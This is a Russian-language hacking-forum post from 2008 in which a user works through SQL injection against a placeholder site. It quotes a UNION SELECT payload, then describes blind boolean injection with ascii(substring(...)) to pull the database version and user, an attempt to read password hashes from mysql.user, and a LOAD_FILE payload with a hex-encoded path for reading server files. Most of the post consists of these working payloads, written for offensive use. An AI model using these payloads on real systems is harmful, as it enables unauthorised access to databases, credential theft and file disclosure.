различные результат на *group+by* и *union+select*

#10

29.07.2008, 17:33

mr.celt

Участник форума

Регистрация: 06.02.2008

Сообщений: 110

С нами: 9610572

Репутация: 32

Цитата:

Сообщение от Bonnie and Clyde

попробуй site.com/?nr=-9999+union+select+1,2,3,4/* несуществующее значание

попробовал, также не подходит)
Но немного пораздумав и почитав, что Grey написал, попробовал логические запросы с and.

Как и ожидалось версия оказалась 3.х и соответственно union не поддерживаются

С помощью перлового скрипта перебрал user(), version(), database().
Запрос, типа site.com/?nr=1+and+ascii(substring((select+password+from+my sql.user),1,1))>1/*
тоже не проканал, то ли это расценено как подзапрос, то ли доступа к mysql.user закрыт.

Статья Grey о том как сливать файлы в 3-й версии, если есть доступ, наталкнула на такой запрос
http://site.com/?nr=1&n=1+and+ascii(substring((LOAD_FILE(0x2f77777 72f777777382f757a2f64656661756c742e68746d)),100,1) )>1/*

При его подачи ошибок нет, но и добиться, чтобы условие выполнилось, тоже не смог (захексин путь до файла, который выводится при ошибочной квери)